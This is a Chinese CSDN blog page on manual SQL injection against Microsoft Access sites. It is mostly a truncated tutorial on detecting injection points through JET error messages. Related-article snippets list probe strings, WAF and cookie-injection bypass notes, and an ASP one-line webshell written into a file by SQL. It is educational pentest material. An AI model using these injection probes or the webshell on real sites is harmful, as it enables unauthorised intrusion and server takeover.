渗透测试之access 注入

最新推荐文章于 2023-10-01 21:29:19 发布
最新推荐文章于 2023-10-01 21:29:19 发布
阅读量620 收藏 2
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39783851/article/details/102544859
版权

1. access 数据库简介

Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。

Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软OFFICE的一个成员, 在包括专业版和更高版本的office版本里面被单独出售。2012年12月4日,最新的微软Office Access 2013在微软Office 2013里发布,微软Office Access 2010 是前一个版本。

MS ACCESS以它自己的格式将数据存储在基于Access Jet的数据库引擎里。它还可以直接导入或者链接数据(这些数据存储在其他应用程序和数据库)。

 

2. 注入判断

假设有url:http://xxx.com/news.asp?id=50

              50后面加单引号出现类似如下错误

           Microsoft JET Database Engine 错误 '80040e14'

            语法错误 (操作符丢失) 在查询表达式 'id < 50''' 中。

最低0.47元/天 解锁文章
四维创智
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Access联合注入实战/Cookie注入/简单WAF绕过
weixin_45118086的博客
03-20 678
Access联合注入实战/Cookie注入/简单WAF绕过 首先来说一下Access与MySQL在语法上存在的小差别。 1、在MySQL中,使用select1,2,3语句配合联合注入,但是在Access中,select语句背后必须跟着表名,此方法不再适用 2、在MySQL中,使用limit语句将union后的查询结果放在前面显示,但是在Access中,越晚查询的结果反而越排在前面,无需使用limit进行特殊处理。 靶场地址:靶场 注意,在cookie注入中,用+代替空格 判断注入点 打开新闻后,界面如下:
ACCESS渗透测试
anan2175的博客
05-29 326
access-getshell 直接写shell # 创建临时表 create table test(a varchar(255)); # 插入一句话木马 insert into test(a) values('<%execute request("a")>'); # 写入文件(需要借助文件解析漏洞) select * into [a] in '目标文件路径.asp;.xls...
Acesss数据库手工绕过通用代码防注入系统
weixin_34124939的博客
05-19 236
Acesss数据库手工绕过通用代码防注入系统By antian365 残枫 simeon    ***过程就是各种安全技术的再现过程,本次***从SQL注入点的发现到绕过sql注入通用代码的防注入,可以说是打开了一扇门,通过sql注入获取管理员密码,获取数据库,如果在条件允许的情况下是完全可以获取webshell。在本文中还对access数据库获取webshell等关键技术进行了总结。1.1获取目...
记一次Microsoft Access 数据库的注入与waf的绕过
weixin_48421613的博客
10-14 4372
Microsoft Access Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软OFFICE的一个成员, 在包括专业版和更高版本的office版本里面被单独出售。== 2018年9月25日,最新的
sql注入绕过waf
qq_52108058的博客
11-06 557
id=171删除发现页面错误,通过储存下的cookie添加名称和值刷新,发现页面正常显示,我们不断的为字段进行排序,发现当排序到11处,页面出现错误,返回数据库错误,证明此页面存在sql注入,也测试。发现页面正常显示,说明数据库存在admin表,admin表中存在username,password字段。是加密过的,所以我们需要解密,字母+数字的16位组合,很像md5的特征。因为通过存储中的cookie添加值过于繁琐,所以我们通过插件变简单。发现回显点2,3,7,8,9。发现用户名密码回显,由于密码。
Web Service 渗透测试.docx
06-19
Web Service 渗透测试是针对机构和组织公开的Web应用、外部IP地址以及Web Service进行的安全测试过程。随着Web Service的广泛应用,它已经成为现代软件架构的重要组成部分,然而,安全问题往往被忽视,导致严重安全...
asp+access注入源码.zip_asp+access注入_asp+access源代码_asp注入源码_渗透_渗透代码
09-24
这个压缩包"asp+access注入源码.zip"包含了实现这种注入攻击的源代码,用于学习和理解该漏洞的工作原理以及如何进行渗透测试。 首先,我们需要理解ASP与Access的关系。ASP是微软开发的一种服务器端脚本语言,用于...
渗透学习测试网站源码打包带走
05-24
asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入...
sqlmap 渗透测试工具
最新发布
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
明小子注入工具
08-20
【明小子注入工具】是一款专为渗透测试设计的SQL注入猜解工具,它极大地简化了在安全审计过程中对SQL注入漏洞的探测与利用。在网络安全领域,SQL注入是一种常见的攻击手段,通过输入恶意的SQL语句,攻击者可能获取、...
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
【WEB安全】某waf实战SQL注入绕过fuzz过程
yijinbaiyi的博客
01-17 417
【WEB安全】某waf实战SQL注入绕过fuzz过程 #01 环境简介 服务器:windows2008 R2 软件:phpstudy20180211 php 5.4.45 mysql 5.5.53 某锁win_3.1.18.13服务端版本 #02 Fuzz过程 以基于union注入为例 fuzz order by 过程如下: ?id=1’ order --+ 不拦截 ?id=1’ order b...
Access注入
m0_51313985的博客
05-18 348
3
web安全之Access注入漏洞
Stxiang的博客
10-14 1864
Access注入 判断注入点 ‘ (报错) and 1=1 (and前有空格,带入查询,如果返回正常则有漏洞) and 1=2 (返回错误) or 1=1 或在id后加-号等等,报错则有漏洞 判断数据库类型 and exsits (select * from msysobjects)>0 (如果存在则是Access数据库) and exsits (select * from ...
使用Access数据库站点的渗透思路
asli33的专栏
06-04 956
1、网站使用整套的开源代码,没有更改数据库的路径 就会产生默认数据库下载。   方法:怎样判断一个网站使用的开源版本:版权声明 源码中注释信息   防御:修改默认数据库的文件名和路径名 可以更改为特殊少见的名字 同时使用# 防止直接下载 (但是不可靠%23就可以解决了)或者改成asp后缀(但是可以使用迅雷等软件下载 然后重新命名即可  这样的数据库也可能被插入一句话木马 成为一
Access数据库手工渗透思路过程
joke_ljh的博客
06-02 705
Access数据库手工渗透思路过程 1判断数据库类型 一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,比如有sql可能是mysql,sqlserver。有jet可能是access; 二、通过脚本判断。asp可能是access;aspx可能是sqlserver;php可能是mysql;jsp可能是oracle 三、通过各个数据库特有的数据表来判断: 1、mssql数据库 htt...
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
m0_67844671的博客
10-01 1075
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL手工注入漏洞测试(Access数据库)
硫酸超的博客
07-29 597
判断注入点 http://219.153.49.228:48466/new_list.asp?id=1%20and%201=2 http://219.153.49.228:48466/new_list.asp?id=1%20and%201=1 猜字段 http://219.153.49.228:48466/new_list.asp?id=1%20order%20by%205 字段数为4
超级SQL注入工具V1.1使用详解:渗透测试利器
"超级SQL注入工具(SSQLInjection)是一款高效、全面的SQL注入测试工具,专为渗透测试专家和信息安全专业人士设计。它基于HTTP协议,利用C#开发,通过直接操纵TCP会话进行HTTP交互,提高了发包速度,特别适用于在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值